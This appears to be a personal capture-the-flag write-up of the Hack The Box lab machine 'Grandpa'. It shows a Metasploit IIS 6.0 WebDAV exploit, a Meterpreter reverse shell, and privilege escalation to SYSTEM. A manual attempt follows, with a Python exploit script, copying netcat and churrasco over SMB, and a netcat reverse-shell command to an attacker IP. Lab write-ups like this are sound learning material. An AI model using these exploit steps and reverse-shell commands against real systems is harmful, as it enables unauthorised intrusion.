Grandpa
Grandpa was next after Irked; I went in blind.
Ports
HTTP only.
IIS 6.0
Nmap says:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
A quick google and I decide to yeet metasploit at it:
msf6 exploit( windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit( windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.10
lhost => 10.10.14.10
msf6 exploit( windows/iis/iis_webdav_scstoragepathfromurl) > run
[ * ] Started reverse TCP handler on 10.10.14.10:4444
[ * ] Trying path length 3 to 60 ...
[ * ] Sending stage ( 175174 bytes) to 10.10.10.14
[ * ] Meterpreter session 1 opened ( 10.10.14.10:4444 -> 10.10.10.14:1032) at 2021-03-14 05:31:44 -0400
meterpreter > shell
[ -] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2132 created.
Channel 2 created.
Microsoft Windows [ Version 5.2.3790]
( C) Copyright 1985-2003 Microsoft Corp.
c:\w indows\s ystem32\i netsrv>whoami
whoami
nt authority\n etwork service
Privesc
I run the local exploit suggester and get about 6 different potential options; none of them work. I google for kernel exploits for Server 2003 SP1 (this is what we’ve got), I find some more options and and try them; nada.
What I was doing wrong - and I was doing something wrong - was that I needed to migrate into a different process before I started. So once that was done, no more problems:
msf6 exploit( windows/local/ms14_070_tcpip_ioctl) > sessions 1
[ * ] Starting interaction with 1...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [ System Process]
4 0 System
272 4 smss.exe
280 1080 cidaemon.exe
320 1080 cidaemon.exe
# etc
1408 396 vmtoolsd.exe
1456 396 svchost.exe
1600 396 svchost.exe
1704 396 alg.exe
1840 612 wmiprvse.exe x86 0 NT AUTHORITY\N ETWORK SERVICE C:\W INDOWS\s ystem32\w bem\w miprvse.exe
1920 396 dllhost.exe
2316 612 wmiprvse.exe
2752 3180 rundll32.exe x86 0 C:\W INDOWS\s ystem32\r undll32.exe
3180 1456 w3wp.exe x86 0 NT AUTHORITY\N ETWORK SERVICE c:\w indows\s ystem32\i netsrv\w 3wp.exe
3628 612 davcdata.exe x86 0 NT AUTHORITY\N ETWORK SERVICE C:\W INDOWS\s ystem32\i netsrv\d avcdata.exe
3988 2752 cmd.exe x86 0 NT AUTHORITY\N ETWORK SERVICE C:\W INDOWS\s ystem32\c md.exe
4092 1080 cidaemon.exe
meterpreter > migrate 3628
[ * ] Migrating from 2752 to 3628...
[ * ] Migration completed successfully.
meterpreter > background
[ * ] Backgrounding session 1...
msf6 exploit( windows/local/ms14_070_tcpip_ioctl) > run
[ * ] Started reverse TCP handler on 10.10.14.10:1234
[ * ] Storing the shellcode in memory...
[ * ] Triggering the vulnerability...
[ * ] Checking privileges after exploitation...
[ +] Exploitation successful!
[ * ] Sending stage ( 175174 bytes) to 10.10.10.14
[ * ] Meterpreter session 2 opened ( 10.10.14.10:1234 -> 10.10.10.14:1040) at 2021-03-14 06:05:40 -0400
meterpreter > shell
Microsoft Windows [ Version 5.2.3790]
( C) Copyright 1985-2003 Microsoft Corp.
C:\W INDOWS\s ystem32>whoami
whoami
nt authority\s ystem
I’m going to do this again tomorrow without Metasploit by following a walkthrough.
Addendum
So I went back to this to try it without MSF. I looked at a couple of write-ups, but they used identical tooling. Foothold was via this python script. The script contains a whole bunch of shellcode, so it’s not really any clear what it does, so nothing really gained in terms of understanding compared to using Metasploit..
Anyway, it’s invoked like so:
python shell.py 10.10.10.14 80 10.10.14.5 1234
And you catch the shell in a listener. Next, people used a ‘token impersonation’ attack for privesc with a binary called churrasco . It’s copied to a directory that we have write access to (which we conveniently have at C:\wmpub), then executed. Copy it along with netcat using smbserver :
┌──( root💀kali) -[/opt/htb/grandpa]
└─# python3 /usr/share/doc/python3-impacket/examples/smbserver.py share .
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[ * ] Config file parsed
[ * ] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[ * ] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[ * ] Config file parsed
[ * ] Config file parsed
[ * ] Config file parsed
[ * ] Incoming connection ( 10.10.10.14,1031)
[ * ] AUTHENTICATE_MESSAGE ( \, GRANPA)
[ * ] User GRANPA\ authenticated successfully
[ * ] :::00::aaaaaaaaaaaaaaaa
[ * ] AUTHENTICATE_MESSAGE ( HTB\G RANPA$, GRANPA)
[ * ] User GRANPA\G RANPA$ authenticated successfully
[ * ] GRANPA$: :HTB:d62c92d82cb9dafc00000000000000000000000000000000:6521e6930e53d3e7c9bb0cbbcb53eb6a8d769dc217d66bbc:aaaaaaaaaaaaaaaa
# etc
Copy the files:
C:\w mpub>icacls C:\w mpub
icacls C:\w mpub
C:\w mpub BUILTIN\A dministrators:( F)
BUILTIN\A dministrators:( I)( OI)( CI)( F)
NT AUTHORITY\S YSTEM:( I)( OI)( CI)( F)
CREATOR OWNER:( I)( OI)( CI)( IO)( F)
BUILTIN\U sers:( I)( OI)( CI)( RX)
BUILTIN\U sers:( I)( CI)( AD)
BUILTIN\U sers:( I)( CI)( WD)
Successfully processed 1 files; Failed processing 0 files
C:\w mpub>copy \\ 10.10.14.5\s hare\n c.exe .
copy \\ 10.10.14.5\s hare\n c.exe .
1 file( s) copied.
C:\w mpub>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\w mpub
03/16/2021 10:59 AM <DIR> .
03/16/2021 10:59 AM <DIR> ..
03/16/2021 10:52 AM 59,392 nc.exe
04/12/2017 04:05 PM <DIR> wmiislog
1 File( s) 59,392 bytes
3 Dir( s) 18,093,953,024 bytes free
C:\w mpub>copy \\ 10.10.14.5\s hare\c hurrasco.exe c.exe
copy \\ 10.10.14.5\s hare\c hurrasco.exe c.exe
1 file( s) copied.
And execute it; anything called after -d will be executed as system:
C:\w mpub>.\c .exe -d "C: \w mpub \n c.exe -e cmd.exe 10.10.14.5 1235"
.\c .exe -d "C: \w mpub \n c.exe -e cmd.exe 10.10.14.5 1235"
Program too big to fit in memory
Ahhhhh, WTF? This is the same as 0xdf did:
C:\wmpub>.\c.exe -d “C:\wmpub\nc.exe -e cmd.exe 10.10.14.47 443”
But it worked for him, and not for me. Grrrr. Try this then:
C:\wmpub>.\c.exe -d "type C:\Users\Administrator\Desktop\root.txt"
Program too big to fit in memory
Dunno why I bothered really.